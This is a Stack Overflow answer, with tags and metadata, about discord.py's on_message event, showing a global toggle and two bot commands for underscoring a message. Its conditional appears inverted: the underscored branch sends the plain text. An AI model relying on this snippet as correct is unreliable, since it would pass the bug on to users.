[ "You get that error because on_message event takes only one argument, which is the message (discord.Message class). You can refere the documentation here\nYou will have to implement it to every command manually, instead of using the on_message event\n# global variable that can be accessed by every command\nunderscored_s = False\n\n@bot.command()\nasync def underscored(ctx):\n global underscored_s\n\n # toggle underscored status, turn on if off, turn off if on\n if underscored_s is True:\n underscored_s = False\n await ctx.send(\"changed underscored to False\")\n else:\n underscored_s = True\n await ctx.send(\"changed underscored to True\")\n\n@bot.command()\nasync def on_message(ctx):\n global underscored_s\n\n message = \"This is a test command.\"\n if underscored_s is True:\n await ctx.send(message)\n else:\n await ctx.send(message.replace(' ', '_'))\n\non_message event is to be used when a new message is sent by a user, to process it by the bot. I dont think that it can be used to edit the message sent by the bot as a reply to the on_message event\n" ]
[ 1 ]
[]
[]
[ "bots", "discord", "discord.py", "python" ]
stackoverflow_0074531641_bots_discord_discord.py_python.txt